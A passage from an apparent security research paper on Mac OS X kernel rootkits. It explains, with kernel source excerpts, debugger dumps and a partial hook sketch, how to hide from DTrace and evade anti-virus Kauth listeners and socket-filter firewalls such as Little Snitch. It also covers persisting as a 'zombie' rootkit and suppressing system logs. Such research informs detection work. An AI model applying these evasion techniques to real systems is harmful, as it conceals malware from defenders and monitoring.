        systrace_getarg,
        NULL,
        systrace_destroy
};

systrace_enable() will modify sysent function pointers and redirect them
to dtrace_systrace_syscall(). Code snippet responsible for this:

(...)
 lck_mtx_lock(&dtrace_systrace_lock);
 if (sysent[sysnum].sy_callc == systrace_sysent[sysnum].stsy_underlying)
 {
    vm_offset_t dss = (vm_offset_t)&dtrace_systrace_syscall;
    ml_nofault_copy((vm_offset_t)&dss,
(vm_offset_t)&sysent[sysnum].sy_callc, sizeof(vm_offset_t));
 }
 lck_mtx_unlock(&dtrace_systrace_lock);
(...)

Attaching a kernel debugger and inserting a breakpoint on
systrace_enable() confirms this (keep in mind all these values include
ASLR slide of 0x24a00000):

Before:

gdb$ print *(struct sysent*)(0xffffff8025255840+5*sizeof(struct sysent))
$12 = {
  sy_narg = 0x3,
  sy_resv = 0x0,
  sy_flags = 0x0,
  sy_call = 0xffffff8024cfc210,          <- open syscall, sysent[5]
  sy_arg_munge32 = 0xffffff8024fe34f0,
  sy_arg_munge64 = 0,
  sy_return_type = 0x1,
  sy_arg_bytes = 0xc
}

dtrace_systrace_syscall is located at address 0xFFFFFF8024FDC630.

After enabling a 'syscall::open:entry' probe:

gdb$ print *(struct sysent*)(0xffffff8025255840+5*sizeof(struct sysent))
$13 = {
  sy_narg = 0x3,
  sy_resv = 0x0,
  sy_flags = 0x0,
  sy_call = 0xffffff8024fdc630,    <- now points to dtrace_systrace_syscall
  sy_arg_munge32 = 0xffffff8024fe34f0,
  sy_arg_munge64 = 0,
  sy_return_type = 0x1,
  sy_arg_bytes = 0xc
}

To recall DTrace's flow:
  User                          Kernel
open() -|-> unix_syscall64() -> dtrace_systrace_syscall -> open() syscall

What are the conclusions from all this? If only the sysent table function
pointers are modified by the rootkit, DTrace will be unable to directly
detect the rootkit using syscall provider. The modified pointer will
be copied by DTrace and return to it. DTrace is blind to the original
function because it does not exist anymore in the table, only inside
our modified version.

If we modify the syscall handler as described in 2.6 and do not update
the sysent references in DTrace related functions then DTrace usage will
signal the potential presence of a rootkit. DTrace is still referencing
the original sysent table and will modify it but the syscall handler is
not. The result is that DTrace syscall provider will never receive any
event. Conclusion: don't forget to fix those references, although the
functions that need to be patched are all static.


------[ 6.2.5.2 - fbt provider

fbt stands for function boundary tracing and allows tracing function entry
and exit of almost all kernel related functions (there is a small list of
untraceable functions called critical_blacklist [bsd/dev/i386/fbt_x86.c]).

The possibilities to detect malicious code using this provider are higher
due to its design and implementation. An example using rubilyn rootkit
is the best way to demonstrate this:

#dtrace -s /dev/stdin -c "ls /"
fbt:::entry
/pid == $target/
{
}
^D

Searching output for getdirentries64, without rootkit:

  0  99661             unix_syscall64:entry
  0  97082  kauth_cred_uthread_update:entry
  0  91985            getdirentries64:entry
  0  92677        vfs_context_current:entry

Now with rootkit loaded:

  0  99661             unix_syscall64:entry
  0  97082  kauth_cred_uthread_update:entry
  0   2119        new_getdirentries64:entry  <- hooked syscall!!!
  0  91985            getdirentries64:entry  <- original function
  0  92677        vfs_context_current:entry

A very simple trace is able to detect both the hooked syscall and the
call to original getdirentries64. Houston, we have a rootkit problem!

DTrace's fbt design and implementation are very interesting so let me
"briefly" go thru it to find a way to hide the rootkit.

fbt's design is explained in [23]:

"On x86, FBT uses a trap-based mechanism that replaces one of the
instructions in the sequence that establishes a stack frame (or one of
the instructions in the sequence that dismantles a stack frame) with an
instruction to transfer control to the interrupt descriptor table (IDT).
The IDT handler uses the trapping instruction pointer to look up the FBT
probe and transfers control into DTrace. Upon return from DTrace, the
replaced instruction is emulated from the trap handler by manipulating
the trap stack."

The source files we should focus on are bsd/dev/i386/fbt_x86.c and
bsd/dev/dtrace/fbt.c.

DTrace's OS X implementation is done using an illegal instruction opcode,
which is (usually) patched into the instruction that sets the base pointer
(EBP/RBP). The instruction is emulated inside DTrace and not re-executed
as it happens in debuggers using int3 breakpoints.

Memory dump example with getdirentries64:

Before activating the provider:

gdb$ x/10i 0xFFFFFF8024D01C20
0xffffff8024d01c20:  55                            push   rbp
0xffffff8024d01c21:  48 89 e5                      mov    rbp,rsp
0xffffff8024d01c24:  41 56                         push   r14
0xffffff8024d01c26:  53                            push   rbx

After:

# dtrace -n fbt::getdirentries64:entry

gdb$ x/10i 0xFFFFFF8024D01C20
0xffffff8024d01c20:  55                         push   rbp
0xffffff8024d01c21:  f0 89 e5                   lock mov ebp,esp <- patched
0xffffff8024d01c24:  41 56                      push   r14
0xffffff8024d01c26:  53                         push   rbx

The function that does all the work to find the patch location is
__provide_probe_64() [bsd/dev/i386/fbt_x86.c] (FBT_PATCHVAL defines the
illegal opcode byte).

Patching is done at fbt_enable() [bsd/dev/dtrace/fbt.c]:

if (fbt->fbtp_currentval != fbt->fbtp_patchval)
{
    (void)ml_nofault_copy((vm_offset_t)&fbt->fbtp_patchval,
(vm_offset_t)fbt->fbtp_patchpoint, sizeof(fbt->fbtp_patchval));

    fbt->fbtp_currentval = fbt->fbtp_patchval;
    ctl->mod_nenabled++;
}

The following diagram shows the trap handling of the illegal instruction:

Activate fbt Provider
       |
       v
  fbt_enable()
       |
       v
Invalid instruction
   exception
-------|-----------[ osfmk/x86_64/idt64.s ]
       v
  idt64_invop()
       |
       v
 hndl_alltraps()
       |
       v
trap_from_kernel()
-------|-----------[ osfmk/i386/trap.c ]
       v
  kernel_trap()
-------|-----------[ bsd/dev/i386/fbt_x86.c ]
       v
fbt_perfCallback()             (...)                    .-> emulate ->
-------|-----------[ bsd/dev/dtrace/dtrace_subr.c ]     | continue
       v                                                | instruction
  dtrace_invop()                                        |
-------|-----------[ bsd/dev/i386/fbt_x86.c ]           |
       v                                                |
   fbt_invop()                                          |
-------|-----------[ bsd/dev/dtrace/dtrace.c ]          |
       v                                                |
  dtrace_probe()                                        |
       |                                                |
       v                                                |
__dtrace_probe()                                        |
       |                                                |
       v                                                |
     (...) ---------------------------------------------

Dtrace is activated inside kernel_trap():
#if CONFIG_DTRACE
    if (__improbable(tempDTraceTrapHook != NULL)) {
        if (tempDTraceTrapHook(type, state, lo_spp, 0) == KERN_SUCCESS) {
            /*
             * If it succeeds, we are done...
             */
            return;
        }
    }
#endif /* CONFIG_DTRACE */

tempDTraceTrapHook is just a function pointer, which in fbt provider
case points to fbt_perfCallback [bsd/dev/i386/fbt_x86.c]. The latter
is responsible for calling the DTrace functionality and emulating the
patched instruction. The emulations depends on the type of patch that
was made - prologue (entry) or epilogue (return), and which instruction
was patched. These can be:

- MOV RSP, RBP
- POP RBP
- LEAVE
- Also NOPs used by the sdt provider (statically defined tracing)

This information is stored inside DTrace internal structures and returned
by the call to dtrace_invop():

emul = dtrace_invop(saved_state->isf.rip, (uintptr_t *)saved_state,
saved_state->rax);

It is not possible to just patch this call because the emul value
determines the type of emulation that needs to be executed after.

dtrace_invop is used by fbt and sdt providers and does nothing more than
calling function pointers contained in dtrace_invop_hdlr linked list
[bsd/dev/dtrace/dtrace_subr.c].

Continuing through the diagram...

fbt_invop is a good candidate to hijack and hide whatever we want from
DTrace. This can be done via a trampoline or modifying the function
pointer contained in dtrace_invop_hdlr list (symbol available in kernel).
From what I could test this list is initialised with the pointer to
fbt_invop() before any calls are made to fbt provider. In principle we
can modify it without waiting for initial DTrace execution.

int fbt_invop(uintptr_t addr, uintptr_t *state, uintptr_t rval)
{
    fbt_probe_t *fbt = fbt_probetab[FBT_ADDR2NDX(addr)];

    for (; fbt != NULL; fbt = fbt->fbtp_hashnext) {
        if ((uintptr_t)fbt->fbtp_patchpoint == addr) {

            if (fbt->fbtp_roffset == 0) {
                x86_saved_state64_t *regs = (x86_saved_state64_t *)state;

                CPU->cpu_dtrace_caller = *(uintptr_t
*)(((uintptr_t)(regs->isf.rsp))+sizeof(uint64_t)); // 8(%rsp)
                /* 64-bit ABI, arguments passed in registers. */
                dtrace_probe(fbt->fbtp_id, regs->rdi, regs->rsi, regs->rdx,
regs->rcx, regs->r8); // <---------- call to dtrace functionality --------
                CPU->cpu_dtrace_caller = 0;
            } else {
                dtrace_probe(fbt->fbtp_id, fbt->fbtp_roffset, rval, 0, 0,
0);
                CPU->cpu_dtrace_caller = 0;
            }
            return (fbt->fbtp_rval); <- the emul value
        }
    }
    return (0);
}

fbt_invop finds probed address information stored in fbt_probetab array
and enters DTrace probe code. The return value that is needed for the
emulation is stored inside the structure. To fiddle with DTrace we
can emulate this function or create a modified fbt_perfCallback, adding
conditions to hide our own addresses. It contains no private symbols so
this is an easy task.

Next, is a potential implementation of a hooked fbt_perfCallback function.
Please notice that all the necessary code is not implemented. It is a
mix of code and "algorithms".

kern_return_t
fbt_perfCallback_hooked(int trapno, x86_saved_state_t *tagged_regs,
                        uintptr_t *lo_spp, __unused int unused2)
{
    kern_return_t retval = KERN_FAILURE;
    x86_saved_state64_t *saved_state = saved_state64(tagged_regs);

    if (FBT_EXCEPTION_CODE == trapno && !IS_USER_TRAP(saved_state))
    {
        uintptr_t addr = saved_state->isf.rip;
        // XXX: verify if we want to hide this address
        //      remember that addr here is where illegal instruction
        //      occurred so our list must contain that info
        int addr_is_to_hide = hide_from_fbt(addr); // implement this
        if (addr_is_to_hide)
        {
            // XXX: find fbt_probetab symbol here so we can use it next

            // and now get the search starting point
            fbt_probe_t *fbt = fbt_probetab[FBT_ADDR2NDX(addr)];
            // find the structure for current addr
            for (; fbt != NULL; fbt = fbt->fbtp_hashnext)
            {
                if ((uintptr_t)fbt->fbtp_patchpoint == addr)
                {
                    // XXX: emulate all code inside fbt_perfCallback here
                    // except call to dtrace_invop()
                    // this is the code that is inside the first IF
                    // conditions in the original function a couple of
                    // symbols might need to be solved, easy!
                }
            }
            // add fail case here ? shouldn't be necessary unless a big
            // f*ckup occurs inside DTrace structures
        }
        // nothing to hide so call the original function
        else
        {
            kern_return_t ret = KERN_FAILURE;
            // XXX: don't forget we need to solve this symbol
            ret = fbt_perfCallback(trapno, tagged-regs, lo_spp, unused2);
            return ret;
        }
    }
    return retval;
}

Functions that we want to hide from DTrace will never reach its
probe system, effectively hiding them. The performance impact should
be extremely low unless there are too many functions to hide, and
hide_from_fbt() takes too long to execute.


----[ 6.3 - AV-Monster II

AV-Monster is a (old, Feb'12) PoC that exploits the Kauth interface
used by OS X anti-virus solutions [21]. Pardon me for bringing an old
subject to this paper but it perfectly illustrates an attack on Kauth,
and also because AV vendors, as far as I know, did nothing or very little
regarding this problem.

Apple recommends in [22] that anti-virus install Kauth listeners - they
can receive file events and pass them to the scan engine. The problem
is that this creates a single point of failure that we can (easily)
exploit to bypass the scan engine and remain undetectable (AV detection
effectiveness discussion is out of scope ;-)).

A very basic AV scanning workflow is:
Execute file -> Kauth generates event -> AV kext listener -> AV scan
engine

It illustrates at least two distinct possibilities to *easily* bypass
the anti-virus. One is to patch Kauth and the other to patch the kext
listener. The old PoC code just NOPs the listener callback to render
it inoperative - the scanning engine stops receiving any events. This is
too noisy! A stealth implementation should just hijack that step and hide
the files we want to, as it is done with hiding files in the filesystem.

This time let me show you how to attack Kauth's. The example will be based
on the KAUTH_FILEOP_OPEN action and open() syscall. To avoid unnecessary
browsing of XNU sources, this is the worflow up to the interesting point:

open() -> open_nocancel() -> open1()    [ bsd/vfs/vfs_syscalls.c ]
                               |
                               v
[ bsd/vfs/vfs_vnops.c ]  vn_open_auth() -> vn_open_auth_finish()
                                                    |
                                                    v
[ bsd/kern/kern_authorization.c ]        kauth_authorize_fileop()
                                                    |
                                                    v
                                        kauth_authorize_action()
                                                    |
                                                    v
                                             listener callback

I do not want to spam you with code but allow me to reprint the fileop
function:

int
kauth_authorize_fileop(kauth_cred_t credential, kauth_action_t action,
uintptr_t arg0, uintptr_t arg1)
{
        char            *namep = NULL;
        int             name_len;
        uintptr_t       arg2 = 0;

        /* we do not have a primary handler for the fileop scope so bail
         * out if there are no listeners.
         */
        if ((kauth_scope_fileop->ks_flags & KS_F_HAS_LISTENERS) == 0) {
                return(0);
        }

        if (action == KAUTH_FILEOP_OPEN || action == KAUTH_FILEOP_CLOSE ||
action == KAUTH_FILEOP_EXEC) {
            /* get path to the given vnode as a convenience to our
             * listeners.
             */
                namep = get_pathbuff();
                name_len = MAXPATHLEN;
                if (vn_getpath((vnode_t)arg0, namep, &name_len) != 0) {
                        release_pathbuff(namep);
                        return(0);
                }
                if (action == KAUTH_FILEOP_CLOSE) {
                        arg2 = arg1;  /* close has some flags that come in
via arg1 */
                }
                arg1 = (uintptr_t)namep;
        }
        kauth_authorize_action(kauth_scope_fileop, credential, action,
arg0, arg1, arg2, 0);

        if (namep != NULL) {
                release_pathbuff(namep);
        }
        return(0);
}

The purpose of this function is to retrieve some useful data to the
listener. In this case it is the vnode reference of the file and its
full path. Apple's documentation confirms it:

KAUTH_FILEOP_OPEN  Notifies that a file system object (a file
or directory) has been opened. arg0 (of type vnode_t) is a vnode
reference. arg1 (of type (const char *)) is a pointer to the object's
full path.

It is clear now that this is a great place to hijack and hide files
we do not want the AV to scan (or some other listener - this is also a
good feature for a file monitor). We just need to verify if current file
matches our list and return 0 if positive, else call the original code
(all these functions are not static so we can easily find the symbols).

And that's it. Simple, uh? :-)


----[ 6.4 - Little Snitch

Little Snitch is a popular application firewall that can blow up the
rootkit cover if network communications are needed and its not taken
care of (nobody likes a snitch!). Socket filters is the OS X feature that
enables Little Snitch to easily intercept and control (network) sockets
without need for hooking or any other (unstable/dubious) tricks. They
can filter inbound or outbound traffic on a socket and also out-of-band
communication [17].

The installation of a socket filter is done using the sflt_register()
function, for each domain, type, and protocol socket. Little Snitch
loops to install the filter in all possible socket combinations.

extern errno_t sflt_register(const struct sflt_filter *filter,
                             int domain,
                             int type,
                             int protocol);

The interesting detail of sflt_register() is the sflt_filter structure
[bsd/sys/kpi_socketfilter.h]. It contains a series of callbacks for
different socket operations:

struct sflt_filter {
 sflt_handle                     sf_handle;
 int                             sf_flags;
 char                            *sf_name;
 sf_unregistered_func            sf_unregistered;
 sf_attach_func                  sf_attach; // handles attaches to sockets.
 sf_detach_func                  sf_detach;
 sf_notify_func                  sf_notify;
 sf_getpeername_func             sf_getpeername;
 sf_getsockname_func             sf_getsockname;
 sf_data_in_func                 sf_data_in; // handles incoming data.
 sf_data_out_func                sf_data_out;
 sf_connect_in_func              sf_connect_in; // handles inbound
 connections.
 sf_connect_out_func             sf_connect_out;
 sf_bind_func                    sf_bind; // handles binds.
 (...)
}

History repeats itself and once again the easiest way is to hook
the function pointers and do whatever we want. Little Snitch driver
(it's an I/O Kit driver and not a kernel extension) loads very early so
hooking sflt_register() and modifying the structure on the fly is not
very interesting. We need to lookup the structure in kernel memory and
modify it.

Many different socket filters can be attached to the same socket so there
must be a data structure holding this information. The interesting source
file is bsd/kern/kpi_socketfilter.c, where a tail queue is created and
referenced using a static variable sock_filter_head.

struct socket_filter {
        TAILQ_ENTRY(socket_filter)      sf_protosw_next;
        TAILQ_ENTRY(socket_filter)      sf_global_next;
        struct socket_filter_entry      *sf_entry_head;

        struct protosw                  *sf_proto;
        struct sflt_filter              sf_filter;
        u_int32_t                       sf_refcount;
};

TAILQ_HEAD(socket_filter_list, socket_filter);
static struct socket_filter_list        sock_filter_head;

There are a few functions referencing sock_filter_head and
the disassembler can be helpful to find the correct location
(sflt_attach_internal() is a good candidate). Using gdb attached to
kernel and sock_filter_head address:

gdb$ print *(struct socket_filter_list*)0xFFFFFF800EAAC9F8
$1 = {
  tqh_first = 0xffffff8014811f08,
  tqh_last = 0xffffff8014898e18
}

(sock_filter_head located at 0xFFFFFF80008AC9F8 in 10.8.2 plus KASLR of
0xe200000 in this example)

Iterating around the tail queue we find the Little Snitch socket filter:

gdb$ print *(struct socket_filter*)0xffffff801483e608
$7 = {
  sf_protosw_next = {
    tqe_next = 0x0,
    tqe_prev = 0xffffff8014811f08
  },
  sf_global_next = {
    tqe_next = 0xffffff801483e508,
    tqe_prev = 0xffffff801483e718
  },
  sf_entry_head = 0xffffff801b29a1c8,
  sf_proto = 0xffffff800ea2bca0,
  sf_filter = {
    sf_handle = 0x27e3ea,
    sf_flags = 0x5,
    sf_name = 0xffffff7f8eb1357b "at_obdev_ls",
    sf_unregistered = 0xffffff7f8eb0938f,
    sf_attach = 0xffffff7f8eb093f9,
    sf_detach = 0xffffff7f8eb09539,
    sf_notify = 0xffffff7f8eb095e8,
    sf_getpeername = 0xffffff7f8eb096a4,
    sf_getsockname = 0xffffff7f8eb09707,
    sf_data_in = 0xffffff7f8eb0974f,
    sf_data_out = 0xffffff7f8eb09bfa,
    sf_connect_in = 0xffffff7f8eb0a076,
    sf_connect_out = 0xffffff7f8eb0a295,
    sf_bind = 0xffffff7f8eb0a446,
    sf_setoption = 0xffffff7f8eb0a4ff,
    sf_getoption = 0xffffff7f8eb0a547,
    sf_listen = 0xffffff7f8eb0a58f,
    sf_ioctl = 0xffffff7f8eb0a612,
    sf_ext = {
      sf_ext_len = 0x38,
      sf_ext_accept = 0xffffff7f8eb0a65a,
      sf_ext_rsvd = {0x0, 0x0, 0x0, 0x0, 0x0}
    }
  },
  sf_refcount = 0x17
}

The sf_name field from sflt_filter structure can be used to match
the correct socket filter, otherwise we would have to find the driver
addresses and match the function pointers that belong to that address
space.

Different possibilities exist to hide our network connections
from Little Snitch and also Apple's application firewall (named
com.apple.nke.applicationfirewall). The easiest one is to patch or
hook the sf_attach callback. Documentation from the previously mentioned
include file:

/*!
 @typedef sf_attach_func

 @discussion sf_attach_func is called to notify the filter it has been
attached to a socket. The filter may allocate memory for this attachment
and use the cookie to track it. This filter is called in one of two cases:
  1) You've installed a global filter and a new socket was created.
  2) Your non-global socket filter is being attached using the SO_NKE
socket option.
 @param cookie Used to allow the socket filter to set the cookie for this
attachment.
 @param so The socket the filter is being attached to.
 @result If you return a non-zero value, your filter will not be attached
to this socket.
*/
typedef errno_t (*sf_attach_func)(void  **cookie, socket_t so);

Forcing the callback to return a non-zero value will effectively take
socket filter firewalls out of the equation. The problem here is that
the socket_t structure might not have enough information to distinguish
the cases we want to hide - it is too early in the process so there is
no address to connect to. There are two fields that contain the PID
information of the last process to interact with the socket so this can
be useful if we already know the PID to hide connection from/to.

The other callbacks contain "richer" information for our purposes,
in particular the structure sockaddr. If you want/need this type of
fine-grain control you should hook here and use that structure to
make your hide or not decision. As an exercise, to dump the target
address you can attach gdb to the kernel and use the kgmacros command
"showsockaddr" on that argument address (assuming you are breakpointing
at the callback address).

Another piece of information that can be used to control which process
is related to the current socket the is the cookie that is set on attach
callback and passed along to almost all other callbacks. The cookie is a
user-defined structure and the following is a partial reverse of Little
Snitch's definition:

struct Cookie
{
(...)
0x48: IOLock *lock;
0x74: pid_t pid; // process to whom the socket belongs to
0x78: int32_t count;
0x7C: int32_t *xxx;
0x80: int32_t protocol;
0x85: int8_t domain;
0x86: int8_t type;
(...)
}

As in Kauth, the socket filters create a single point of failure where we
can easily hook and filter our "evil" connections. The real difficulty is
to find the head of the socket filter tail queue. Having a disassembler
in the rootkit makes this a easy task, opening the door to easily bypass
application firewalls.


----[ 6.5 - Zombie rootkits

The idea here is to explore kernel memory allocations and leaks. Kernel
and kernel extensions share the same memory map, kernel_map, and there
are a few kernel functions "families" to allocate kernel memory:

- kalloc.
- kmem_alloc.
- OSMalloc.
- MALLOC/FREE.
- IOMalloc/IOFree for I/O Kit.

All functions are wrappers for kernel_memory_allocate(). For additional
information check [30], [31] Chapter 6, [13] Chapter 12.

My initial (too complicated idea) was to load the rootkit, hook whatever
was needed, unload the rootkit, and then protect the memory that was
used. This was based in the fact that unloading does not destroy the
rootkit memory so everything would work as long those blocks of memory
were not reallocated to something else. I wanted to edit with kernel
memory map and mark those pages as used.

If we have a rootkit running that is not associated with a kernel
extension we kind of have a zombie rootkit and solve a few problems such
as no need to hide from kextstat, no kernel extension structures to find,
etc. I later found out that Hoglund and Butler had a similar idea in
[32] when they describe the NonPagedPool memory trick - allocate memory
in that area, copy the rootkit, and unload the driver. New ideas are
tough to have :-).

Back to the original point...
Simple things usually work better so there is no point in starting with
the complicated method. The easiest way is to create a memory leak and
use it to store the zombie rootkit version. When the original kernel
extension is unloaded all the memory that was previously allocated using
one of the functions above (tested with kalloc and _MALLOC) will not be
free'd, creating a kernel memory leak that we can abuse and profit from.

The beloved ASCII diagram:

load rootkit -> find rootkit -> calculate rootkit -> alloc zombie
                base address          size             memory
                                                          |
                                                          v
unload original <- transfer control <- fix memory <- copy rootkit into
   rootkit            to zombie        protections     zombie memory

To unload the original rootkit is extremely easy - we do not need to
execute any additional command, just return KERN_FAILURE from the start
function and rootkit will not be loaded. The zombie rootkit already
gained control before this so there is no problem and we avoid to execute
a kextunload command. Simple :-).

The control transfer to zombie code has a small caveat that inherits
from previous paragraph - the start function must return a value so we
can't simple jump into the zombie. Two ideas come to my mind to solve
this problem; first we can hook some kernel function and there transfer
control to zombie, second we can use kernel threads - create a new thread
and let the main one return.

To create a kernel thread the function kernel_thread_start() can be used
(include <kern/thread.h> and Mach KPI). Its prototype is:

kern_return_t
kernel_thread_start(thread_continue_t continuation, void *parameter,
thread_t *new_thread);

Continuation parameter is a C function pointer where new thread will start
execution, parameter is data that we might want to pass to the new thread,
and new_thread a thread reference that the caller is responsible for.

The zombie thread start function should have a prototype like this:

void start_thread(void *parameter, wait_result_t wait)

To set the start function pointer we need to find that function address
in the zombie memory. Symbol information is not available (__LINKEDIT
segment is not loaded) and to avoid reading from the filesystem we can
use a quick trick - find the rootkit base address and find the difference
to the address of start function in the rootkit (since that is in the
original rootkit code). Since we have the zombie start address returned
from the memory allocation, we just need to add the difference and we
have the location of the start function inside the zombie. Computed the
function pointer we can now pass it to kernel_thread_start() and be sure
that zombie code will execute.

Next problem...

Copying the original rootkit into the new area invalidates the external
symbols solved when kernel extension was loaded. Kernel extension code
is position independent (PIC) so calls are made referencing the current
instruction address. If we modify the location address and maintain
the offset, then the symbol is not valid anymore and most probably will
generate a kernel panic when executed.

Example:
Rootkit loaded in memory:
gdb$ x/10i 0xffffff7f83ad671c
0xffffff7f83ad671c:  55                        push   rbp
0xffffff7f83ad671d:  48 89 e5                  mov    rbp,rsp
0xffffff7f83ad6720:  48 8d 3d d1 09 00 00      lea    rdi,[rip+0x9d1]
# 0xffffff7f83ad70f8 <- string reference
0xffffff7f83ad6727:  30 c0                     xor    al,al
0xffffff7f83ad6729:  5d                        pop    rbp
0xffffff7f83ad672a:  e9 61 29 35 7f            jmp    0xffffff8002e29090 <-
call to kernel's printf, solved when kext was loaded

The zombie copy:
gdb$ x/10i 0xffffff80392ba724
0xffffff80392ba724:  55                        push   rbp
0xffffff80392ba725:  48 89 e5                  mov    rbp,rsp
0xffffff80392ba728:  48 8d 3d d1 09 00 00      lea    rdi,[rip+0x9d1]
# 0xffffff80392bb100 <- string reference will be valid
0xffffff80392ba72f:  30 c0                     xor    al,al
0xffffff80392ba731:  5d                        pop    rbp
0xffffff80392ba732:  e9 61 29 35 7f            jmp    0xffffff80b860d098 <-
this is a random address and will crash when we call this Function

I am not sure if there is a better solution but I opted out to manually
fix the offsets in the zombie code (probably influenced by the quick
trick to find the thread start function). My idea is to build a table
of all external symbols we will need to fix (hardcoded string table or
read kext symbol tables from disk) and solve their addresses. With this
information we can disassemble the kernel and find all references, and
also compute the (references's) difference to the rootkit base address.

The final step is to fix the offsets in the zombie references. We
have the difference for each reference so we can calculate where each
reference is located in the zombie memory and recompute the new offset
to the external symbol. References to the __DATA segment do not need to
be fixed - the offsets remain valid since that segment was copied and
relative distance remains the same. Maybe a bit too much work but the
disassembler engine makes this rather easy to accomplish. If you have
a better solution I am eager to read about it.

Returning KERN_FAILURE to kextload will generate noisy log messages
about the rootkit.

/var/log/system.log:
May  7 02:26:10 mountain-lion-64.local com.apple.kextd[12]: Failed to load
/Users/reverser/the_flying_circus.kext - (libkern/kext) kext (kmod)
start/stop routine failed.

dmesg:
Kext put.as.the-flying-circus start failed (result 0x5).
Kext put.as.the-flying-circus failed to load (0xdc008017).
Failed to load kext put.as.the-flying-circus (error 0xdc008017).

The dmesg output can be silenced by temporarily patching OSKextLog
function or by directly memory patching the binaries that call this
function. The fastest and easiest way is to do it inside the kernel -
solve the symbol and patch the first instruction to a ret. After rootkit
is loaded we can restore original byte and everything is back to normal.

The syslog output is generated by kextd daemon. Two quick solutions
come to my mind - one is to patch syslogd as described before, another
is to patch kextd. The symbol used to send the message to syslogd
is asl_vlog. It is an external symbol in kextd. The symbol stub can
be temporarily patched into a ret to avoid failure logging. Find the
kextd process from process list, process its Mach-O header and locate
the symbol stub address in __stubs section. Nothing very complicated!

To detect when to restore the logging features, we can use a quick and
dirty hack. Loop inside the zombie thread until kextload process is
finished. Then the original bytes can be restored and its business as
usual but with a zombie rootkit loaded.

The foundation blocks to zombie rootkits are exposed, the remaining are
implementation details that do not matter much here and can be found in
the attached sample code.


--[ 7 - Caveats & Detection

Writing rootkits is a dangerous and unstable game and that is why it is
such a fun game (or work for those doing it for money). You are always
at mercy of subtle or major changes that can ruin all your efforts and
uncloak your toy. Nevertheless, these are the same reasons why writing
rootkits is so fun - you need to make it as stable and future-proof
as possible, and try to think in all different detection paths. It
is a never-ending story, quite frustrating at times but mentally and
creatively challenging.

This paper is considerably huge but still incomplete! There are a few
missing areas and you probably spotted a few problems with some of its
approaches. Let me try to describe some.

One of the main problems is the dependency on proc, task and some other
structures. These are opaque to outsiders for one good reason - they
are changed frequently between major OS X versions. For example, when I
was researching I forgot to include a define and things were not working
(lucky or not it was not crashing the test system). Three different proc_t
(and task_t) versions must be included to create a rootkit compatible
with the three latest major OS X versions. And it is most certain that
it will break with a new major release.

In practice there is at least one rather easy way to overcome this
difficulty. The effective number of fields required from proc and task
structures is small. We can resort to information "leaks" from functions
referencing those fields and retrieve the structure offset. Including a
disassembler in the rootkit makes this task easier and safer. There are
many suitable functions - small, stable, and with very few different
structures and variables. Many are static, but the number of exported
ones are more than enough for this purpose.

Filesystem checks (offline in particular) are a significant threat
to rootkits, especially when there is a good reference baseline. Good
rootkits must try to keep their filesystem (and memory) footprint to a
minimum. One of the usual weakest points is the rootkit startup. It must
be initialised somewhere! OS X features so many places where this can
happen but this information is available to both defensive and offensive
sides. Binaries modification (for example, kernel extension injection
as featured in last Phrack) is a good method but (easily) detectable by
checksum checks.

Regarding this problem, we can try to abuse additional features. OS X
contains many data files that are mutable (sqlite3 databases, for example)
and by nature difficult to checksum. A potential vulnerability using
these data files could be explored and all the rootkit code stored
there. Nothing new here, just remembering additional attacking and
storage points.

Extreme care is required with rootkit's code - it must be as bug free
as possible so that any inconsistencies and/or bugs do not reveal its
presence, and must be carefully designed, for example, authentication
and encryption on all communications. It is quite a joke that a simple
ioctl call can expose OS.X/Crisis [4]. There is a "rule" - if it runs,
it can be reversed. But lets not make that so easy, ok?

Duplicating functions to use with the trampoline trick is also a
potential source of problems if those functions are changed in new
versions. This can be avoided by using the original functions - modify
the call references or hijack the function and return to the original
one. Using the NOP alignment space allows us to keep pointers and
references inside the kernel memory address space and less suspicious
to an initial analysis.

Detection and creation of tools is the next logical step. OS X lacks this
kind of tools and here lies a good opportunity for future research and
development. The defensive side against rootkits is even more challenging
and requires additional creativity (and maybe kernel knowledge) to
develop safer and reliable detection methods. The challenge is issued :-).


--[ 8 - Final words

This was a long paper and I sincerely hope it was useful in some way
to you who had the time and patience to read it. New ideas are hard to
come by and there (probably) are many here that were somehow previously
explored by others. Please apologize me if missing attribution - it
is only because I do not know or I am not aware who is the original
author/source. It is particularly difficult when you read so much stuff
thru the years.

The full disclosure discussion is extremely complicated and impossible to
reach consensus. Full source code is hereby released because I believe
it is the only (viable) alternative to move things forward and call
for additional research and solutions. OS X is a great platform but it
(still) suffers from a invincibility mystique that it is false and
dangerous. There are companies producing commercial rootkits sold to
governments to potentially spy on citizens (they say criminals, we have
no idea since there is no transparency).

Obviously these  tools can be used for legitimate purposes (such as
tracking real bad guys) but also no so legitimate - power corrupts and
temptation is too big to spy and control everyone. A balance is required
and it can come from improved research and defensive tools. Scoffing
at the low incentives or potential difficulties is not the solution -
history has shown that there is always someone who will leap forward
and break the establishment.

This paper's goal is not to assist in developing a surveillance dissident
death machine (name kindly suggested by thegrugq!) but to show the
different ways it can be built, and how to detect and protect against
them. I can't avoid its potential bad usage but at least it should make
the playing field a bit more balanced.

Greets to nemo, noar, snare, all my put.as friends (saure, od, spico,
kahuna, emptydir, korn, g0sh, ...), thegrugq, diff-t, tal0n and everyone
else at C., the blog readers and #osxre boys & girls.

And a big middle finger to Apple as a company, born from the hacking
spirit and now transformed against hacking.

Enjoy & have fun,
fG!


--[ 9 - References

[1] ghalen and wowie, Developing Mac OSX kernel rootkits
    http://www.phrack.org/issues.html?issue=66&id=16&mode=txt

[2] prdelka, Rubilyn 0.0.1
    http://www.nullsecurity.net/tools/backdoor.html

[3] 0xfeedbeef, volafox : rubilyn Rootkit Analysis
    http://feedbeef.blogspot.pt/2012/10/volafox-rubilyn-rootkit-analysis.ht
    ml

[4] fG!, Tales from Crisis
    http://reverse.put.as/2012/08/06/tales-from-crisis-chapter-1-the-droppe
    rs-box-of-tricks/

[5] snare, Resolving kernel symbols
    http://ho.ax/posts/2012/02/resolving-kernel-symbols/

[6] Landon Fuller - Fixing ptrace(pt_deny_attach, ...) on Mac OS X 10.5
    Leopard, http://landonf.bikemonkey.org/code/macosx/Leopard_PT_DENY_ATTA
    CH.20080122.html

[7] Miller, Charlie & Zovi, Dino Dai, The Mac Hacker's Handbook
    Wiley Publishing, 2009, ISBN: 978-0-470-39536-3

[8] Wikipedia, Interrupt descriptor table
    http://en.wikipedia.org/wiki/Interrupt_descriptor_table

[9] fG!, bruteforcesysent
    https://github.com/gdbinit/bruteforcesysent

[10] OS X ABI Mach-O File Format Reference
     https://developer.apple.com/library/mac/#documentation/developertools/
     conceptual/MachORuntime/Reference/reference.html

